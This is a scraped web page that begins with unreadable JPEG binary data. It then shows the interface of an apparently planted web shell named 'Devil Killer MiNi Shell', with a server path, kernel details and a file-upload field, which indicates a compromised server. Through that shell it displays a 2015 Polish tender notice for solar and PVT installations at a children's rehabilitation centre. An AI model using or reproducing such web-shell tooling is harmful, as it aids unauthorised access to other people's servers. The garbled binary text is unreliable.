JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150120/14080-N-2015.html

<p class="kh_header"><b>Radziszów: Wykonanie instalacji kolektorów słonecznych, oraz instalacji z wykorzystaniem paneli PVT dla Małopolskiego Centrum Rehabilitacji Dzieci Solidarność.</b><br>
<b>Numer ogłoszenia: 14080 - 2015; data zamieszczenia: 20.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolskie Centrum Rehabilitacji Dzieci "Solidarność" w Radziszowie , ul. Podlesie 173, 32-052 Radziszów, woj. małopolskie, tel. 012 2751753, faks 012 2751750.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mcrd.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie instalacji kolektorów słonecznych, oraz instalacji z wykorzystaniem paneli PVT dla Małopolskiego Centrum Rehabilitacji Dzieci Solidarność..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny</b></p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zamówienie realizowane jest w ramach projektu współfinansowanego przez Wojewódzki Fundusz Ochrony Środowiska i Gospodarki Wodnej w Krakowie
Działanie:             Odnawialne źródła energii
Tytuł projektu: Wykonanie instalacji kolektorów słonecznych, oraz instalacji z wykorzystaniem paneli PVT dla Małopolskiego Centrum Rehabilitacji Dzieci Solidarność.  

2.	Przedmiotem zamówienia jest zaprojektowanie i wykonanie robót budowlanych polegających na dostawie i budowie instalacji kolektorów słonecznych oraz modułów ko-generacyjnych (PVT) wraz z konstrukcją wsporczą oraz osprzętem na dachu budynku Małopolskiego Centrum Rehabilitacji Dzieci Solidarność w Radziszowie. 
3.	Szczegółowy zakres robót objętych niniejszym zamówieniem określa Program Funkcjonalno-Użytkowy, które stanowią odpowiednio załącznik nr 8 do specyfikacji istotnych warunków zamówienia
4.	Zamówienie  obejmuje między innymi:
a)	Wykonanie i uzgodnienie z Inwestorem Koncepcji Projektowej, zgodnej z postanowieniami PFU, zawierającej uproszczony schemat instalacji ko-generacyjnej i instalacji solarnej, oraz rozmieszczenie podstawowych urządzeń instalacji (moduły, kolektory, przetwornice, wymienniki, układy pompowe, rurociągi, rozdzielnie automatyki) wraz z opisem technologicznym oraz doborem urządzeń.
b)	Wykonanie dokumentacji projektowej obejmującej:
sporządzenie niezbędnych inwentaryzacji i ekspertyz opinii geologicznej, uzyskanie map, warunków przyłączenia uzgodnień ZUDP itp. 
wykonanie projektu budowlano-wykonawczego instalacji solarnej i ko-generacyjnej do celów zmniejszenia zapotrzebowania obiektu na energię elektryczną i cieplną 
wykonanie projektu konstrukcji wsporczej na dachu płaskim modułów ko-generacyjnych i kolektorów słonecznych.
wykonanie projektu elektrycznego oraz AKPiA zapewniającego prawidłowe działanie układu oraz monitorowanie i archiwizację danych wraz z ewentualną zmianą istniejącego układu pomiarowo - rozliczeniowego i korektę przyłącza 
wykonanie Specyfikacji Technicznej Wykonania i Odbioru Robót
uzyskanie wszelkich niezbędnych uzgodnień i pozwoleń,
c)	Wykonanie wszelkich prac na podstawie sporządzonej i zatwierdzonej dokumentacji projektowej oraz uzyskanych pozwoleń. 
d)	Uruchomienie instalacji, sporządzenie dokumentacji powykonawczej, dokonanie odpowiednich odbiorów przez instytucje zewnętrzne. Przeszkolenie personelu obsługującego. 
e)	Wykonanie dokumentacji powykonawczej w wersji papierowej i na nośniku CD.
5.	Wykonawca w ramach zadania wykona wszystkie czynności związane z pełnym wykonaniem instalacji fotowoltaicznej ( uruchomieniem ), w tym podłączenie instalacji do sieci elektroenergetycznej wraz ze zgłoszeniem przyłączenia mikroinstalacji do sieci elektroenergetycznej oraz wykona wszelkie czynności z montażem instalacji solarnej wraz z podłączeniem jej do istniejącej instalacji cwu i wymiennika basenowego.
6.	Zamawiający przedstawił w dokumentacji przetargowej (Program Funkcjonalno - Użytkowy) minimalne wymagania jakościowe i techniczne wymagane przy oferowaniu przez Wykonawcę. Oznacza to, że w ofercie nie mogą być zaoferowane materiały o niższym standardzie i gorszych parametrach technicznych niż określone w dokumentacji przetargowej. Wykonawca proponujący inne materiały zobowiązany jest wykazać, że są one równoważne jakościowo i spełniają wymagane normy, parametry i standardy, poparte atestami i certyfikatami dopuszczającymi je do obrotu na rynku materiałów budowlanych oraz stosowania w budownictwie. W takim przypadku zadaniem Wykonawcy jest wskazanie i udowodnienie wymaganego przez Zamawiającego poziomu jakości. W przypadku niższego standardu i gorszych parametrów technicznych zaoferowanych materiałów, oferta zostanie odrzucona.
7.	Wszędzie tam, gdzie w przedmiocie zamówienia występuje konkretna norma, aprobata, specyfikacja techniczna i techniczne systemy odniesienia ustanowione przez Polskie oraz Europejskie organy normalizacyjne, Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane przez niego roboty budowlane spełniają wymagania określone przez Zamawiającego.
8.	Wszędzie tam, gdzie w opisie przedmiotu zamówienia mogą wystąpić nazwy producenta, modelu, symbole, znaki towarowe Zamawiający dopuszcza rozwiązania równoważne czyli użycie do wyceny i wbudowania materiałów, urządzeń i technologii innych producentów w stosunku do przywołanych pod warunkiem, że proponowany przez Wykonawcę materiał posiada parametry techniczne i fizyczne takie same jak materiały wskazane w dokumentacji projektowej.
9.	Dla realizacji zamówienia należy uwzględnić również  niżej wymienione czynności i roboty oraz poniesienie kosztów z tym związanych:
a)	wykonanie wszelkich niezbędnych robót przygotowawczych, towarzyszących i zabezpieczających koniecznych do wykonania zamówienia,
b)	niezbędne prace instalacyjno-budowlane, odtworzeniowe, adaptacyjne itp. związane z przedmiotem zamówienia,
c)	prace montażowe kolektorów słonecznych i paneli fotowoltaicznych wraz z konstrukcją wsporczą,
d)	związane z montażem zasobników układu solarnego, niezbędnych urządzeń, armatury, elektryki i AKPiA
e)	obejmujące montaż rurociągów z glikolem,
f)	obejmujące montaż rurociągów z gorącą i zimną wodą,
g)	kabli energetycznych zasilanych energią wyprodukowaną w kolektorach PVT i wpięcie do rozdzielnic napięcia,
h)	niezbędnej aparatury kontrolno-pomiarowej,
i)	armatury i urządzeń, wraz z zasilaniem w energię elektryczną i sterowaniem całego układu, zapewniając optymalizację jego pracy,
j)	urządzeń transformujących energię elektryczną z kolektorów PVT na energię elektryczną o parametrach zgodnych z instalacją szpitalną,
k)	wykonanie systemów: dodatkowej ochrony od porażeń, połączeń wyrównawczych, oraz ochrony przepięciowej,
l)	wykonanie układu wizualizacji parametrów pracy systemów,
m)	uruchomienie systemów, próby i rozruch,
n)	poniesienia wszelkich opłat i odszkodowań za wyrządzone szkody w związku z realizacją budowy,
o)	dostarczenie Zamawiającemu przed wbudowaniem certyfikatów, atestów oraz po wykonaniu zadania dokumentacji powykonawczej wraz z wynikami prób i sprawdzeń, przygotowanie kompletnej dokumentacji powykonawczej. 
p)	wywiezienie elementów pochodzących z rozbiórki w miejsce uzgodnione z Zamawiającym, potwierdzone protokołem przekazania do właściwego podmiotu,
q)	ponoszenie kosztów zużycia wody i energii elektrycznej niezbędnych do montażu instalacji, jej sprawdzenia i rozruchu. Ponoszenie kosztów zużycia tych mediów w okresie realizacji robót będzie następować na podstawie porozumień Wykonawcy z Zamawiającym,

10.  Wszystkie produkty powinny być nowe rok produkcji 2014-2015 posiadać aktualne certyfikaty jakości raz być wyprodukowane w Unii Europejskiej.
11. Wykonawca zobowiązany będzie wykonać roboty zgodnie z niniejszą SIWZ, zawartą umową i ofertą przetargową. Ponadto zamówienie należy wykonywać w sposób gwarantujący spełnienie warunków:
1)	Ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (tj. Dz. U. z 2010 r. nr 243, poz. 1623),
2)	właściwych przepisów bhp i ppoż.,
12. Gwarancja jakości: Wykonawca udzieli rękojmi na wady fizyczne zmniejszające wartość użytkową i techniczną wykonanych robót, w wysokości co najmniej 5 lat od daty odbioru końcowego. W stosunku do paneli fotowoltaicznych, gwarancja będzie nie krótsza niż 10 lat, inwertery 5 lat, konstrukcja 10 lat. 
12. Nazwy i kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień Publicznych 
71320000-7  Usługi inżynieryjne w zakresie projektowania 
71232310-0  Usługi projektowania systemów zasilania energia elektryczną 
45000000-7  Roboty budowlane
45316000-5   Instalowanie systemów oświetleniowych i sygnalizacyjnych
45300000-0  Roboty instalacyjne w budynkach
45231000-5 Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych
45300000-0  Roboty w zakresie instalacji budowlanych
45310000-3  Roboty w zakresie instalacji elektrycznych
45315700-5  Instalowanie rozdzielni elektrycznych
09331200-0 Słoneczne moduły fotoelektryczne
09332000-5 Instalacje słoneczne.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 45.31.00.00-3, 45.31.57.00-5, 09.33.12.00-0, 09.33.20.00-5, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda wniesienia wadium w wysokości 15 000,00 zł.
2.	Wadium należy wnieść przed terminem składania ofert.
3.	Wadium może być wnoszone w jednej lub kilku następujących formach:

a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.U. Nr 109, poz. 1158 z późn. zmianami ).
4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego: prowadzony przez Bank BPH S.A. o numerze 90 1060 0076 0000 3380 0005 2502 . Przelew należy zatytułować WADIUM PRZETARG - wykonanie instalacji solarnych i PVT dla MCRD.
5.	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
6.	Wadium w formie pieniężnej uznaje się za wniesione z chwilą jego wpływu na wskazany rachunek bankowy.
7.	Zwrot i zatrzymanie wadium nastąpi zgodnie z art. 46 ustawy Prawo zamówień publicznych.
Wadium wniesione w formie niepieniężnej  np. gwarancje  należy złożyć w
          oryginale.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy wykonali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał:
a)	minimum dwa zamówienia polegające na instalacji modułów (paneli) ko-generacyjnych o nominalnej mocy energetycznej nie mniejsza niż 35 kWpeak, nominalna moc cieplna urządzeń PVT winna być nie mniejsza niż 130 kW, w tym; 	jednej instalacji zamontowanej na dachu budynku (z podaniem rodzaju i wartości, daty i miejsca wykonania wraz z załączeniem dokumentu potwierdzającego, że robota budowlana została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona),
b)	minimum dwa zamówienia polegającą na budowie montażu instalacji kolektorów słonecznych instalacji solarnej w obiekcie użyteczności publicznej o powierzchni kolektorów słonecznych nie mniejszej niż 150 m2 każda, przy czym co najmniej jedna robota budowlana musi być wykonana w formule  zaprojektuj i wybuduj</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy dysponują:
1)	przynajmniej 1 osobą z uprawnieniami do projektowania o specjalności instalacyjnej w zakresie  instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83 poz. 578 z późn. zm.), posiadająca doświadczenie zawodowe min 3 lata. Osoba powinna wykazać się doświadczeniem w wykonaniu projektów dla instalacji solarnych o łącznej powierzchni czynnej kolektorów min 500 m2, które zostały zrealizowane i oddane do użytkowania. 
2)	przynajmniej 1 osobą z uprawnieniami do projektowania o specjalności instalacyjnej w zakresie  sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83 poz. 578 z późn. zm.), posiadająca doświadczenie zawodowe min 3 lata. Osoba powinna wykazać się doświadczeniem w wykonaniu projektów dla instalacji PVT o łącznej powierzchni czynnej kolektorów min 200 m2, które zostały zrealizowane i oddane do użytkowania, 
3)	przynajmniej 1 osobą, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych
4)	przynajmniej 1 osobą, posiadającą uprawnienia do kierowania robotami instalacyjnymi w specjalności sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych
 
zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane ( Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie ( Dz. U .Nr 83, poz.578 z późn. zm.).
Zamawiający określając wymogi dla osób w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane w państwach członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz w państwach Europejskiego Obszaru Gospodarczego, stosownie do przepisu art.12 a ustawy Prawo budowlane oraz przepisów ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. Nr 63, poz.394).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy dysponują:
1)	przynajmniej 1 osobą z uprawnieniami do projektowania o specjalności instalacyjnej w zakresie  instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83 poz. 578 z późn. zm.), posiadająca doświadczenie zawodowe min 3 lata. Osoba powinna wykazać się doświadczeniem w wykonaniu projektów dla instalacji solarnych o łącznej powierzchni czynnej kolektorów min 500 m2, które zostały zrealizowane i oddane do użytkowania. 
2)	przynajmniej 1 osobą z uprawnieniami do projektowania o specjalności instalacyjnej w zakresie  sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. Nr 83 poz. 578 z późn. zm.), posiadająca doświadczenie zawodowe min 3 lata. Osoba powinna wykazać się doświadczeniem w wykonaniu projektów dla instalacji PVT o łącznej powierzchni czynnej kolektorów min 200 m2, które zostały zrealizowane i oddane do użytkowania, 
3)	przynajmniej 1 osobą, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych
4)	przynajmniej 1 osobą, posiadającą uprawnienia do kierowania robotami instalacyjnymi w specjalności sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych
 
zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane ( Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie ( Dz. U .Nr 83, poz.578 z późn. zm.).
Zamawiający określając wymogi dla osób w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane w państwach członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz w państwach Europejskiego Obszaru Gospodarczego, stosownie do przepisu art.12 a ustawy Prawo budowlane oraz przepisów ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. Nr 63, poz.394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek finansowy będzie potwierdzony, spełniony jeżeli wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej, w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę ubezpieczenia nie niższą niż 1.000 000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

